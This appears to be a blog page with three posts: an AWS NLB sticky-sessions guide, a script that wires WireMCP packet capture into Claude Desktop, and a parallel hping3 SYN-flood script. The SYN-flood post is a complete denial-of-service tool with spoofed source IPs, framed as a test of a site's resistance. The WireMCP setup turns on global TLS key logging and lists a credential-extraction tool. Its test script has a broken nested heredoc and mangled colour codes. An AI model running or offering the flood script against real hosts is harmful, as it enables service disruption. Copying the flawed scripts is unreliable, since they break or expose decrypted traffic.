Deep Dive: AWS NLB Sticky Sessions Setup, Behavior, and Hidden Pitfalls

When you deploy applications behind a Network Load Balancer (NLB) in AWS, you usually expect perfect traffic distribution — fast, fair, and stateless.
But what if your backend holds stateful sessions — like in-memory login sessions, caching, or WebSocket connections — and you need a given client to keep hitting the same target every time?

That’s where NLB sticky sessions (also called connection stickiness or source IP affinity) come in. They’re powerful but also misunderstood — and misconfiguring them can lead to uneven load, dropped connections, or mysterious client “resets.”

Let’s break down exactly how they work, how to set them up, what to watch for, and how to troubleshoot the tricky edge cases that appear in production.


1. What Are Sticky Sessions on an NLB?

At a high level, sticky sessions ensure that traffic from the same client consistently lands on the same target (EC2 instance, IP, or container) behind your NLB.

Unlike the Application Load Balancer (ALB) — which uses HTTP cookies for stickiness — the NLB operates at Layer 4 (TCP/UDP).
That means it doesn’t look inside your packets. Instead, it bases stickiness on network-level parameters like:

  • Source IP address
  • Destination IP and port
  • Source port (sometimes included in the hash)
  • Protocol (TCP, UDP, or TLS passthrough)

AWS refers to this as “source IP affinity.”
When enabled, the NLB creates a flow-hash mapping that ties the client to a backend target.
As long as the hash remains the same, the same client gets routed to the same target — even across multiple connections.


2. Enabling Sticky Sessions on an AWS NLB

Stickiness is configured per target group, not at the NLB level.

Step-by-Step via AWS Console

  1. Go to EC2 → Load Balancers → Target Groups
    Find the target group your NLB listener uses.
  2. Select the Target Group → Attributes tab
  3. Under Attributes, set:
  • Stickiness.enabled = true
  • Stickiness.type = source_ip
  1. Save changes and confirm the attributes are updated.

Step-by-Step via AWS CLI

```bash
aws elbv2 modify-target-group-attributes \
--target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123 \
--attributes Key=stickiness.enabled,Value=true Key=stickiness.type,Value=source_ip

How to Verify:

aws elbv2 describe-target-group-attributes \
  --target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123

Sample Output:

{
    "Attributes": [
        { "Key": "stickiness.enabled", "Value": "true" },
        { "Key": "stickiness.type", "Value": "source_ip" }
    ]
}

3. How NLB Stickiness Actually Works (Under the Hood)

The NLB’s flow hashing algorithm calculates a hash from several parameters — often the “five-tuple”:

<protocol, source IP, source port, destination IP, destination port>

The hash is used to choose a target. When stickiness is enabled, NLB remembers this mapping for some time (typically a few minutes to hours, depending on flow expiration).

Key Behavior Points:

  • If the same client connects again using the same IP and port, the hash matches → same backend target.
  • If any part of that tuple changes (e.g. client source port changes), the hash may change → client might hit a different target.
  • NLBs maintain this mapping in memory; if the NLB node restarts or fails over, the mapping is lost.
  • Sticky mappings can also be lost when cross-zone load balancing or target health status changes.

Not Cookie-Based

Because NLBs don’t inspect HTTP traffic, there’s no cookie involved.
This means:

  • You can’t set session duration or expiry time like in ALB stickiness.
  • Stickiness only works as long as the same network path and source IP persist.

4. Known Limitations & Edge Cases

Sticky sessions on NLBs are helpful but brittle. Here’s what can go wrong:

IssueCauseEffect
Client source IP changesNAT, VPN, mobile switching networksHash changes → new target
Different source portClient opens multiple sockets or reconnectsEach connection may map differently
TLS termination at NLBNLB terminates TLSStickiness not supported (only for TCP listeners)
Unhealthy targetHealth check failsMapping breaks; NLB reroutes
Cross-zone load balancing toggledDistribution rules changeMay break existing sticky mappings
DNS round-robin at clientNLB has multiple IPs per AZClient DNS resolver may change NLB node
UDP behaviorStateless packets; different flow hashStickiness unreliable for UDP
Scaling up/downNew targets addedHash table rebalanced; some clients remapped

🧠 Tip: If you rely on stickiness, keep your clients stable (same IP) and avoid frequent target registration changes.

🔹 5. Troubleshooting Sticky Session Problems

When things go wrong, these are the most common patterns you’ll see:

1. “Stickiness not working”

  • Check target group attributes: aws elbv2 describe-target-group-attributes --target-group-arn <arn> Ensure stickiness.enabled is true.
  • Make sure your listener protocol is TCP, not TLS.
  • Confirm that client IPs aren’t being rewritten by NAT or proxy.
  • Check CloudWatch metrics → if one target gets all the traffic, stickiness might be too “sticky” due to limited source IP variety.

2. “Some clients lose session state randomly”

  • Verify client network stability — mobile clients or corporate proxies can rotate IPs.
  • Confirm health checks aren’t flapping targets.
  • Review your application session design — if session data lives in memory, consider an external session store (Redis, DynamoDB, etc.).

3. “Load imbalance — one instance overloaded”

  • This can happens when many users share one public IP (common in offices or ISPs).
    All those clients hash to the same backend.
  • Mitigate by:
    • Disabling stickiness if not strictly required.
    • Using ALB with cookie-based stickiness (more granular).
    • Scaling target capacity.

4. “Connections drop after some time”

  • NLB may remove stale flow mappings.
  • Check TCP keepalive settings on clients and targets. Ensure keepalive_time < NLB idle timeout (350 seconds) to prevent connection resets. Linux commands below:
# Check keepalive time (seconds before sending first keepalive probe)
sysctl net.ipv4.tcp_keepalive_time

# Check keepalive interval (seconds between probes)
sysctl net.ipv4.tcp_keepalive_intvl

# Check keepalive probes (number of probes before giving up)
sysctl net.ipv4.tcp_keepalive_probes

# View all at once
sysctl -a | grep tcp_keepalive
  • Verify idle timeout on backend apps (e.g., web servers closing connections too early).

6. Observability & Testing

You can validate sticky behavior with:

  • CloudWatch metrics:
    ActiveFlowCount, NewFlowCount, and per-target request metrics.
  • VPC Flow Logs: confirm that repeated requests from the same client IP go to the same backend ENI.
  • Packet captures: Use tcpdump or ss on your backend instances to see if the same source IP consistently connects.

Quick test with curl:

for i in {1..100}; do 
    echo "=== Request $i at $(date) ===" | tee -a curl_test.log
    curl http://<nlb-dns-name>/ -v 2>&1 | tee -a curl_test.log
    sleep 0.5
done

Run it from the same host and check which backend responds (log hostname on each instance).
Then try from another IP or VPN — you’ll likely see a different target.

7. Best Practices

  1. Only enable stickiness if necessary.
    Stateless applications scale better without it.
  2. If using TLS: terminate TLS at the backend or use ALB if you need session affinity.
  3. Use shared session stores.
    Tools like ElastiCache (Redis) or DynamoDB make scaling simpler and safer.
  4. Avoid toggling cross-zone load balancing during traffic — it resets the sticky map.
  5. Set up proper health checks — unhealthy targets break affinity immediately.
  6. Monitor uneven load — large NAT’d user groups can overload a single instance.
  7. For UDP — consider designing idempotent stateless processing; sticky sessions may not behave reliably.

8. Example Architecture Pattern

Scenario: A multiplayer game server behind an NLB.
Each player connects via TCP to the game backend that stores their in-memory state.

✅ Recommended setup:

  • Enable stickiness.enabled = true and stickiness.type = source_ip
  • Disable TLS termination at NLB
  • Keep targets in the same AZ with cross-zone load balancing disabled to maintain stable mapping
  • Maintain external health and scaling logic to avoid frequent re-registrations

This setup ensures that the same player IP always lands on the same backend server, as long as their network path is stable.

9. Summary Table

AttributeSupported ValueNotes
stickiness.enabledtrue / falseEnables sticky sessions
stickiness.typesource_ipOnly option for NLB
Supported ProtocolsTCP, UDP (limited)Not supported for TLS listeners
Persistence DurationUntil flow resetNot configurable
Cookie-based Stickiness❌ NoUse ALB for cookie-based
Best forStateful TCP appse.g. games, custom protocols

10. When to Use ALB Instead

If you’re dealing with HTTP/HTTPS applications that manage user sessions via cookies or tokens, you’ll be much happier using an Application Load Balancer.
It offers:

  • Configurable cookie duration
  • Per-application stickiness
  • Layer-7 routing and metrics

The NLB should be reserved for high-performance, low-latency, or non-HTTP workloads that need raw TCP/UDP handling.

11. Closing Thoughts

AWS NLB sticky sessions are a great feature — but they’re not magic glue.
They work well when your network topology and client IPs are predictable, and your app genuinely needs flow affinity.
However, if your environment involves NATs, mobile networks, or frequent scale-ups, expect surprises.

When in doubt:
→ Keep your app stateless,
→ Let the load balancer do its job, and
→ Use stickiness only as a last resort for legacy or session-bound systems.

🧩 References

Macbook: Setup wireshark packet capture MCP for Antropic Claude Desktop

If you’re like me, the idea of doing anything twice will make you break out in a cold shiver. For my Claude desktop, I often need network pcap (packet capture) to unpack something that I am doing. So the script below installs wireshark, and then the wireshark mcp and then configures Claude to use it. Then I got it to work with zscaler (note, I just did a process grep – you could also check utun/port 9000/9400).

I also added example scripts to test its working and so prompts to help you test in Claude.

cat > ~/setup_wiremcp_simple.sh << 'EOF'
#!/bin/bash

# Simplified WireMCP Setup with Zscaler Support

echo ""
echo "============================================"
echo "   WireMCP Setup with Zscaler Support"
echo "============================================"
echo ""

# Detect Zscaler
echo "[INFO] Detecting Zscaler..."
ZSCALER_DETECTED=false
ZSCALER_INTERFACE=""

# Check for Zscaler process
if pgrep -f "Zscaler" >/dev/null 2>&1; then
    ZSCALER_DETECTED=true
    echo "[ZSCALER] ✓ Zscaler process is running"
fi

# Find Zscaler tunnel interface
UTUN_INTERFACES=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_INTERFACES; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        ZSCALER_INTERFACE="$iface"
        ZSCALER_DETECTED=true
        echo "[ZSCALER] ✓ Zscaler tunnel found: $iface (IP: $IP)"
        break
    fi
done

if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "[ZSCALER] ✓ Zscaler environment confirmed"
else
    echo "[INFO] No Zscaler detected - standard network"
fi

echo ""

# Check existing installations
echo "[INFO] Checking installed software..."

if command -v tshark >/dev/null 2>&1; then
    echo "[✓] Wireshark/tshark is installed"
else
    echo "[!] Wireshark not found - install with: brew install --cask wireshark"
fi

if command -v node >/dev/null 2>&1; then
    echo "[✓] Node.js is installed: $(node --version)"
else
    echo "[!] Node.js not found - install with: brew install node"
fi

if [[ -d "$HOME/WireMCP" ]]; then
    echo "[✓] WireMCP is installed at ~/WireMCP"
else
    echo "[!] WireMCP not found"
fi

echo ""

# Configure SSL decryption for Zscaler
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "[INFO] Configuring SSL/TLS decryption..."
    
    SSL_KEYLOG="$HOME/.wireshark-sslkeys.log"
    touch "$SSL_KEYLOG"
    chmod 600 "$SSL_KEYLOG"
    
    if ! grep -q "SSLKEYLOGFILE" ~/.zshrc 2>/dev/null; then
        echo "" >> ~/.zshrc
        echo "# Wireshark SSL/TLS decryption for Zscaler" >> ~/.zshrc
        echo "export SSLKEYLOGFILE=\"$SSL_KEYLOG\"" >> ~/.zshrc
        echo "[✓] Added SSLKEYLOGFILE to ~/.zshrc"
    else
        echo "[✓] SSLKEYLOGFILE already in ~/.zshrc"
    fi
    
    echo "[✓] SSL key log file: $SSL_KEYLOG"
fi

echo ""

# Update WireMCP for Zscaler
if [[ -d "$HOME/WireMCP" ]]; then
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        echo "[INFO] Creating Zscaler-aware wrapper..."
        
        cat > "$HOME/WireMCP/start_zscaler.sh" << 'WRAPPER'
#!/bin/bash
echo "=== WireMCP (Zscaler Mode) ==="

# Set SSL decryption
export SSLKEYLOGFILE="$HOME/.wireshark-sslkeys.log"

# Find Zscaler interface
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        export CAPTURE_INTERFACE="$iface"
        echo "✓ Zscaler tunnel: $iface ($IP)"
        echo "✓ All proxied traffic flows through this interface"
        break
    fi
done

if [[ -z "$CAPTURE_INTERFACE" ]]; then
    export CAPTURE_INTERFACE="en0"
    echo "! Using default interface: en0"
fi

echo ""
echo "Configuration:"
echo "  SSL Key Log: $SSLKEYLOGFILE"
echo "  Capture Interface: $CAPTURE_INTERFACE"
echo ""
echo "To capture: sudo tshark -i $CAPTURE_INTERFACE -c 10"
echo "===============================\n"

cd "$(dirname "$0")"
node index.js
WRAPPER
        
        chmod +x "$HOME/WireMCP/start_zscaler.sh"
        echo "[✓] Created ~/WireMCP/start_zscaler.sh"
    fi
    
    # Create test script
    cat > "$HOME/WireMCP/test_zscaler.sh" << 'TEST'
#!/bin/bash

echo "=== Zscaler & WireMCP Test ==="
echo ""

# Check Zscaler process
if pgrep -f "Zscaler" >/dev/null; then
    echo "✓ Zscaler is running"
else
    echo "✗ Zscaler not running"
fi

# Find tunnel
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        echo "✓ Zscaler tunnel: $iface ($IP)"
        FOUND=true
        break
    fi
done

[[ "$FOUND" != "true" ]] && echo "✗ No Zscaler tunnel found"

echo ""

# Check SSL keylog
if [[ -f "$HOME/.wireshark-sslkeys.log" ]]; then
    SIZE=$(wc -c < "$HOME/.wireshark-sslkeys.log")
    echo "✓ SSL key log exists ($SIZE bytes)"
else
    echo "✗ SSL key log not found"
fi

echo ""
echo "Network interfaces:"
tshark -D 2>/dev/null | head -5

echo ""
echo "To capture Zscaler traffic:"
echo "  sudo tshark -i ${iface:-en0} -c 10"
TEST
    
    chmod +x "$HOME/WireMCP/test_zscaler.sh"
    echo "[✓] Created ~/WireMCP/test_zscaler.sh"
fi

echo ""

# Configure Claude Desktop
CLAUDE_CONFIG="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
if [[ -d "$(dirname "$CLAUDE_CONFIG")" ]]; then
    echo "[INFO] Configuring Claude Desktop..."
    
    # Backup existing
    if [[ -f "$CLAUDE_CONFIG" ]]; then
        BACKUP_FILE="${CLAUDE_CONFIG}.backup.$(date +%Y%m%d_%H%M%S)"
        cp "$CLAUDE_CONFIG" "$BACKUP_FILE"
        echo "[✓] Backup created: $BACKUP_FILE"
    fi
    
    # Check if jq is installed
    if ! command -v jq >/dev/null 2>&1; then
        echo "[INFO] Installing jq for JSON manipulation..."
        brew install jq
    fi
    
    # Create temp capture directory
    TEMP_CAPTURE_DIR="$HOME/.wiremcp/captures"
    mkdir -p "$TEMP_CAPTURE_DIR"
    echo "[✓] Capture directory: $TEMP_CAPTURE_DIR"
    
    # Prepare environment variables
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        ENV_JSON=$(jq -n \
            --arg ssllog "$HOME/.wireshark-sslkeys.log" \
            --arg iface "${ZSCALER_INTERFACE:-en0}" \
            --arg capdir "$TEMP_CAPTURE_DIR" \
            '{"SSLKEYLOGFILE": $ssllog, "CAPTURE_INTERFACE": $iface, "ZSCALER_MODE": "true", "CAPTURE_DIR": $capdir}')
    else
        ENV_JSON=$(jq -n \
            --arg capdir "$TEMP_CAPTURE_DIR" \
            '{"CAPTURE_DIR": $capdir}')
    fi
    
    # Add or update wiremcp in config, preserving existing servers
    if [[ -f "$CLAUDE_CONFIG" ]] && [[ -s "$CLAUDE_CONFIG" ]]; then
        echo "[INFO] Merging WireMCP into existing config..."
        jq --arg home "$HOME" \
           --argjson env "$ENV_JSON" \
           '.mcpServers.wiremcp = {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}' \
           "$CLAUDE_CONFIG" > "${CLAUDE_CONFIG}.tmp" && mv "${CLAUDE_CONFIG}.tmp" "$CLAUDE_CONFIG"
    else
        echo "[INFO] Creating new Claude config..."
        jq -n --arg home "$HOME" \
              --argjson env "$ENV_JSON" \
              '{"mcpServers": {"wiremcp": {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}}}' \
              > "$CLAUDE_CONFIG"
    fi
    
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        echo "[✓] Claude configured with Zscaler mode"
    else
        echo "[✓] Claude configured"
    fi
    echo "[✓] Existing MCP servers preserved"
fi

echo ""
echo "============================================"
echo "             Summary"
echo "============================================"
echo ""

if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "Zscaler Environment:"
    echo "  ✓ Detected and configured"
    [[ -n "$ZSCALER_INTERFACE" ]] && echo "  ✓ Tunnel interface: $ZSCALER_INTERFACE"
    echo "  ✓ SSL decryption ready"
    echo ""
    echo "Next steps:"
    echo "  1. Restart terminal: source ~/.zshrc"
    echo "  2. Restart browsers for HTTPS decryption"
else
    echo "Standard Network:"
    echo "  • No Zscaler detected"
    echo "  • Standard configuration applied"
fi

echo ""
echo "For Claude Desktop:"
echo "  1. Restart Claude Desktop app"
echo "  2. Ask Claude to analyze network traffic"
echo ""
echo "============================================"

exit 0
EOF
chmod +x ~/setup_wiremcp_simple.sh

To test if the script worked:

cat > ~/test_wiremcp_claude.sh << 'EOF'
#!/bin/bash

# WireMCP Claude Desktop Interactive Test Script

echo "╔════════════════════════════════════════════════════════╗"
echo "║     WireMCP + Claude Desktop Testing Tool             ║"
echo "╚════════════════════════════════════════════════════════╝"
echo ""

# Colors
GREEN='3[0;32m'
BLUE='3[0;34m'
YELLOW='3[1;33m'
NC='3[0m'

# Check prerequisites
echo -e "${BLUE}[1/4]${NC} Checking prerequisites..."

if ! command -v tshark >/dev/null 2>&1; then
    echo "   ✗ tshark not found"
    exit 1
fi

if [[ ! -d "$HOME/WireMCP" ]]; then
    echo "   ✗ WireMCP not found at ~/WireMCP"
    exit 1
fi

if [[ ! -f "$HOME/Library/Application Support/Claude/claude_desktop_config.json" ]]; then
    echo "   ⚠ Claude Desktop config not found"
fi

echo -e "   ${GREEN}✓${NC} All prerequisites met"
echo ""

# Detect Zscaler
echo -e "${BLUE}[2/4]${NC} Detecting network configuration..."

ZSCALER_IF=""
for iface in $(ifconfig -l | grep -o 'utun[0-9]*'); do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        ZSCALER_IF="$iface"
        echo -e "   ${GREEN}✓${NC} Zscaler tunnel: $iface ($IP)"
        break
    fi
done

if [[ -z "$ZSCALER_IF" ]]; then
    echo "   ⚠ No Zscaler tunnel detected (will use en0)"
    ZSCALER_IF="en0"
fi

echo ""

# Generate test traffic
echo -e "${BLUE}[3/4]${NC} Generating test network traffic..."

# Background network requests
(curl -s https://api.github.com/zen > /dev/null 2>&1) &
(curl -s https://httpbin.org/get > /dev/null 2>&1) &
(curl -s https://www.google.com > /dev/null 2>&1) &
(ping -c 3 8.8.8.8 > /dev/null 2>&1) &

sleep 2
echo -e "   ${GREEN}✓${NC} Test traffic generated (GitHub, httpbin, Google, DNS)"
echo ""

# Show test prompts
echo -e "${BLUE}[4/4]${NC} Test prompts for Claude Desktop"
echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${YELLOW}📋 Copy these prompts into Claude Desktop:${NC}"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 1: Basic Connection Test"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Can you see the WireMCP tools? List all available network analysis capabilities you have access to.
EOF
echo ""
echo "Expected: Claude should list 7 tools (capture_packets, get_summary_stats, etc.)"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 2: Simple Packet Capture"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 20 network packets and show me a summary including:
- Source and destination IPs
- Protocols used
- Port numbers
- Any interesting patterns
EOF
echo ""
echo "Expected: Packets from $ZSCALER_IF with IPs in 100.64.x.x range"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 3: Protocol Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 50 packets and show me:
1. Protocol breakdown (TCP, UDP, DNS, HTTP, TLS)
2. Which protocol is most common
3. Protocol hierarchy statistics
EOF
echo ""
echo "Expected: Protocol percentages and hierarchy tree"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 4: Connection Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 100 packets and show me network conversations:
- Top 5 source/destination pairs
- Number of packets per conversation
- Bytes transferred
EOF
echo ""
echo "Expected: Conversation statistics with packet/byte counts"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 5: Threat Detection"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture traffic for 30 seconds and check all destination IPs against threat databases. Tell me if any malicious IPs are detected.
EOF
echo ""
echo "Expected: List of IPs and threat check results (should show 'No threats')"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 6: HTTPS Decryption (Advanced)"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "⚠️  First: Restart your browser after running this:"
echo "    source ~/.zshrc && echo $SSLKEYLOGFILE"
echo ""
cat << 'EOF'
Capture 30 packets while I browse some HTTPS websites. Can you see any HTTP hostnames or request URIs from the HTTPS traffic?
EOF
echo ""
echo "Expected: If SSL keys are logged, Claude sees decrypted HTTP data"
echo ""

echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${YELLOW}🔧 Manual Verification Commands:${NC}"
echo ""
echo "  # Test manual capture:"
echo "  sudo tshark -i $ZSCALER_IF -c 10"
echo ""
echo "  # Check SSL keylog:"
echo "  ls -lh ~/.wireshark-sslkeys.log"
echo ""
echo "  # Test WireMCP server:"
echo "  cd ~/WireMCP && timeout 3 node index.js"
echo ""
echo "  # Check Claude config:"
echo "  cat \"$HOME/Library/Application Support/Claude/claude_desktop_config.json\""
echo ""

echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${GREEN}✅ Test setup complete!${NC}"
echo ""
echo "Next steps:"
echo "  1. Open Claude Desktop"
echo "  2. Copy/paste the test prompts above"
echo "  3. Verify Claude can access WireMCP tools"
echo "  4. Check ~/WIREMCP_TESTING_EXAMPLES.md for more examples"
echo ""

# Keep generating traffic in background
echo "Keeping test traffic active for 2 minutes..."
echo "(You can Ctrl+C to stop)"
echo ""

# Generate continuous light traffic
for i in {1..24}; do
    (curl -s https://httpbin.org/delay/1 > /dev/null 2>&1) &
    sleep 5
done

echo ""
echo "Traffic generation complete!"
echo ""

EOF

chmod +x ~/test_wiremcp_claude.sh

Now that you have tested everything is fine… the below just gives you a few example tests to carry out.

# Try WireMCP Right Now! 🚀

## 🎯 3-Minute Quick Start

### Step 1: Restart Claude Desktop (30 seconds)
```bash
# Kill and restart Claude
killall Claude
sleep 2
open -a Claude
```

### Step 2: Create a script to Generate Some Traffic (30 seconds)

cat > ~/network_activity_loop.sh << 'EOF'
#!/bin/bash

# Script to generate network activity for 30 seconds
# Useful for testing network capture tools

echo "Starting network activity generation for 30 seconds..."
echo "Press Ctrl+C to stop early if needed"

# Record start time
start_time=$(date +%s)
end_time=$((start_time + 30))

# Counter for requests
request_count=0

# Loop for 30 seconds
while [ $(date +%s) -lt $end_time ]; do
    # Create network activity to capture
    echo -n "Request set #$((++request_count)) at $(date +%T): "
    
    # GitHub API call
    curl -s https://api.github.com/users/octocat > /dev/null 2>&1 &
    
    # HTTPBin JSON endpoint
    curl -s https://httpbin.org/json > /dev/null 2>&1 &
    
    # IP address check
    curl -s https://ifconfig.me > /dev/null 2>&1 &
    
    # Wait for background jobs to complete
    wait
    echo "completed"
    
    # Small delay to avoid overwhelming the servers
    sleep 0.5
done

echo ""
echo "Network activity generation completed!"
echo "Total request sets sent: $request_count"
echo "Duration: 30 seconds"
EOF

chmod +x ~/network_activity_loop.sh

# Call the script
./network_activity_loop.sh 

Time to play!

Now open Claude Desktop and we can run a few tests…

  1. Ask Claude:

Can you see the WireMCP tools? List all available network analysis capabilities.

Claude should list 7 tools:
– capture_packets
– get_summary_stats
– get_conversations
– check_threats
– check_ip_threats
– analyze_pcap
– extract_credentials

2. Ask Claude:

Capture 20 network packets and tell me:
– What IPs am I talking to?
– What protocols are being used?
– Anything interesting?

3. In terminal run:

```bash
curl -v https://api.github.com/users/octocat
```

Ask Claude:

I just called api.github.com. Can you capture my network traffic
for 10 seconds and tell me:
1. What IP did GitHub resolve to?
2. How long did the connection take?
3. Were there any errors?

4. Ask Claude:

Monitor my network for 30 seconds and show me:
– Top 5 destinations by packet count
– What services/companies am I connecting to?
– Any unexpected connections?

5. Developer Debugging Examples – Debug Slow API. Ask Claude:

I’m calling myapi.company.com and it feels slow.
Capture traffic for 30 seconds while I make a request and tell me:
– Where is the latency coming from?
– DNS, TCP handshake, TLS, or server response?
– Any retransmissions?

6. Developer Debugging Examples – Debug Connection Timeout. Ask Claude:

I’m getting timeouts to db.example.com:5432.
Capture for 30 seconds and tell me:
1. Is DNS resolving?
2. Are SYN packets being sent?
3. Do I get SYN-ACK back?
4. Any firewall blocking?

7. TLS Handshake failures (often happen with zero trust networks and cert pinning). Ask Claude:

Monitor my network for 2 mins and look for abnormal TLS handshakes, in particular shortlived TLS handshakes, which can occur due to cert pinning issues.

8. Check for Threats. Ask Claude:

Monitor my network for 60 seconds and check all destination
IPs against threat databases. Tell me if anything suspicious.

9. Monitor Background Apps. Ask Claude:

Capture traffic for 30 seconds while I’m idle.
What apps are calling home without me knowing? Only get conversation statistics to show the key connections and the amount of traffic through each. Show any failed traffic or unusual traffic patterns

10. VPN Testing. Ask Claude:

Capture packets for 60 seconds, during which time i will enable my VPN. Compare the difference and see if you can see exactly when my VPN was enabled.

11. Audit traffic. Ask Claude:

Monitor for 5 minutes and tell me:
– Which service used most bandwidth?
– Any large file transfers?
– Unexpected data usage?

12. Looking for specific protocols. Ask Claude:

Monitor my traffic for 30 seconds and see if you can spot any traffic using QUIC and give me statistics on it.

(then go open a youtube website)

13. DNS Queries. Ask Claude:

As a network troubleshooter, analyze all DNS queries for 30 seconds and provide potential causes for any errors. Show me detailed metrics on any calls, especially failed calls or unusual DNS patterns (like NXDOMAIN, PTR or TXT calls)

14. Certificate Issues. Ask Claude:

Capture TLS handshakes for the next minute and show me the certificate chain. Look out for failed/short live TLS sessions

What Makes This Powerful?

The tradition way used to be:

“`bash
sudo tcpdump -i utun5 -w capture.pcap
# Wait…
# Stop capture
# Open Wireshark
# Apply filters
# Analyze packets manually
# Figure out what it means
“`
Time: 10-30 minutes!

With WireMCP + Claude:


“Capture my network traffic and tell me
what’s happening in plain English”

Time: 30 seconds

Claude automatically:
– Captures on correct interface (utun5)
– Filters relevant packets
– Analyzes protocols
– Identifies issues
– Explains in human language
– Provides recommendations

Testing your sites SYN flood resistance using hping3 in parallel

A SYN flood test using hping3 that allows you to specify the number of SYN packets to send and scales horizontally with a specific number of processes can be created using a Bash script with the xargs command. This approach allows you to distribute the workload across multiple processes for better performance.

The Script

This script uses hping3 to perform a SYN flood attack with a configurable packet count and number of parallel processes.

cat > ./syn_flood_parallel.sh << 'EOF'
#!/bin/bash

# A simple script to perform a SYN flood test using hping3,
# with configurable packet count, parallel processes, and optional source IP randomization.

# --- Configuration ---
TARGET_IP=$1
TARGET_PORT=$2
PACKET_COUNT_TOTAL=$3
PROCESSES=$4
RANDOMIZE_SOURCE=${5:-true}  # Default to true if not specified

# --- Usage Message ---
if [ -z "$TARGET_IP" ] || [ -z "$TARGET_PORT" ] || [ -z "$PACKET_COUNT_TOTAL" ] || [ -z "$PROCESSES" ]; then
    echo "Usage: $0 <TARGET_IP> <TARGET_PORT> <PACKET_COUNT_TOTAL> <PROCESSES> [RANDOMIZE_SOURCE]"
    echo ""
    echo "Parameters:"
    echo "  TARGET_IP           - Target IP address or hostname"
    echo "  TARGET_PORT         - Target port number (1-65535)"
    echo "  PACKET_COUNT_TOTAL  - Total number of SYN packets to send"
    echo "  PROCESSES           - Number of parallel processes (2-10 recommended)"
    echo "  RANDOMIZE_SOURCE    - true/false (optional, default: true)"
    echo ""
    echo "Examples:"
    echo "  $0 192.168.1.1 80 100000 4           # With randomized source IPs (default)"
    echo "  $0 192.168.1.1 80 100000 4 true      # Explicitly enable source IP randomization"
    echo "  $0 192.168.1.1 80 100000 4 false     # Use actual source IP (no randomization)"
    exit 1
fi

# --- Main Logic ---
echo "========================================"
echo "Starting SYN flood test on $TARGET_IP:$TARGET_PORT"
echo "Sending $PACKET_COUNT_TOTAL SYN packets with $PROCESSES parallel processes."
echo "Source IP randomization: $RANDOMIZE_SOURCE"
echo "========================================"

# Calculate packets per process
PACKETS_PER_PROCESS=$((PACKET_COUNT_TOTAL / PROCESSES))

# Build hping3 command based on randomization option
if [ "$RANDOMIZE_SOURCE" = "true" ]; then
    echo "Using randomized source IPs (--rand-source)"
    # Use seq and xargs to parallelize the hping3 command with random source IPs
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --rand-source --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
else
    echo "Using actual source IP (no randomization)"
    # Use seq and xargs to parallelize the hping3 command without source randomization
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
fi

echo ""
echo "========================================"
echo "SYN flood test complete."
echo "Total packets sent: $PACKET_COUNT_TOTAL"
echo "========================================"

EOF

chmod +x ./syn_flood_parallel.sh

Example Usage:

# Default behavior - randomized source IPs (parameter 5 defaults to true)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4

# Explicitly enable source IP randomization
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 true

# Disable source IP randomization (use actual source IP)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 false

# High-volume test with randomized IPs
./syn_flood_parallel.sh example.com 443 100000 8 true

